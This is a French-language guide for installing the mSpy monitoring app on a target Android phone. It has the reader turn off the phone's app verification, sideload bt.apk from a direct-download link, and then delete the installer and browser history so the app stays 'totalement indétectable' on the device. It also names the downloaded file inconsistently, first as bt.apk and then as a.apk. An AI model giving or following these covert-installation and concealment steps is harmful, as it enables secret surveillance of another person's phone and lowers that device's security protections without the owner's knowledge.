Installation sur les appareils Android

Pour installer mSpy sur l’appareil cible Android, version 4 ou supérieure, vous devez avoir l’appareil en main et disposer d’une connexion Internet.

Veuillez noter qu’en raison d’un degré élevé de personnalisation du système d’exploitation Android, il est possible que les étapes décrites s’affichent différemment sur l’interface du téléphone. Cependant toutes sections du menu sont semblables et vous pourrez facilement suivre les indications. Par exemple, au lieu de ‘Applications’ vous pourriez voir ‘Applis’. ‘Gestionnaire d’applications’ ou Gérer les applications.

Étape préparatoire

Avant de commencer l’installation, accédez à Paramètres → Sécurité et assurez-vous que l’option Sources inconnues est cochée. Il est également recommandé de retirer une coche de Vérifiez les applications.

installde1 installfr1 intsallfr2 Securityfr

Remarque: Dans la version Android 5.0+ Vérifiez les applications l’option est situé dans Google Paramètres → Sécurité

French1 French2 French3

Téléchargez l’application

1. 1. Sur l’écran d’accueil , appuyez sur Applis (liste de toutes les applications disponibles), puis choisissez Chrome

installfr4 intsallfr5

2. Une fois la page d’accueil du Chrome affichée, faites légèrement glisser votre doigt depuis le centre de l’écran vers le bas pour faire apparaître la barre d’adresse URL en haut de l’écran. Effacez l’adresse par défaut et saisissez  http://b55y.net/a puis appuyez sur la touche Entrée de votre pavé numérique. Après cela, vous verrez un écran avec captcha avec un code que vous devez entrer pour démarrer le processus de téléchargement.

captcha1 captcha2 captcha3

Veuillez noter que http://b55y.net/a sont les liens à téléchargement direct qui n’ouvrira PAS une nouvelle page Web, mais procédera simplement au téléchargement en arrière-plan (un message contextuel devrait s’afficher pour vous informer du démarrage du téléchargement).

3. 1. Vous pouvez maintenant revenir à Applis sur votre écran d’accueil et sélectionnez Téléchargements où vous verrez le fichier bt.apk. Appuyez sur le fichier bt.apk afin de lancer le processus d’installation

installfr6 btfr

Installation de l’application

1. 1. Une fois le fichier bt.apk est ouvert, suivez la séquence ci-après : Suivant → Installer → Ouvrir

Update1 Update2 Update3
fr

Supprimer l’historique du navigateur et le paquet d’installation

Vous pouvez maintenant supprimer le fichier a.apk de la section Téléchargements. Cochez le fichier (ou sélectionnez-le et maintenez votre doigt appuyé) et l’icône de la corbeille s’affichera au-dessus. Appuyez-dessus pour supprimer le fichier sélectionné

installfr6 btdeletefr

Vous pouvez également effacer l’historique de navigation en suivant la séquence ci-après : accédez à Internet → Menu → Paramètres → Confidentialité et sécurité → Effacer l’historique.

installfr4 installfr20 installfr22 installfr23

De cette manière, l’application mSpy sera totalement indétectable sur l’appareil cible!